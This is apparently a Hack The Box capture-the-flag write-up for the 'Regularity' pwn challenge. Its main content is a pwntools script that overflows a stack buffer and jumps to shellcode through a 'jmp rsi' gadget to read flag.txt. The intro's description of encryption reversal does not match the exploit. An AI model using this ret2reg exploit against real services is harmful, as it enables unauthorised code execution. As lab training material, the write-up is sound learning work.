Post

HackTheBox Regularity Writeup

Posted
By x3ric
1 min read

Explore the basics of cybersecurity in the Regularity Challenge on Hack The Box. This very-easy-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.

Proof of Concept (PoC)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21

from pwn import *

def get_process():
    try:
        host, port = sys.argv[1].split(':')
        return remote(host, int(port))
    except IndexError:
        print(f'Usage: python {sys.argv[0]} <ip:port>')
        exit(1)

elf = context.binary = ELF('./regularity', checksec=False)
p = get_process()
JMP_RSI = next(elf.search(asm('jmp rsi')))
payload = flat({
    0: asm(shellcraft.cat('flag.txt')),
    256: JMP_RSI
})
p.sendlineafter(b'days?\n', payload)
response = p.recvall().decode('utf-8', errors='ignore').rstrip()
print(response)
p.close()

Summary

Regularity is an easy Hack The Box pwn challenge that showcases a buffer overflow exploit. By leveraging the absence of protections like NX and PIE, a ret2reg technique is used to redirect execution to custom shellcode on the stack, popping a shell. It highlights essential exploitation techniques, including shellcoding and memory manipulation.

challenge
htb challenge writeup linux pwn
This post is licensed under CC BY 4.0 by the author.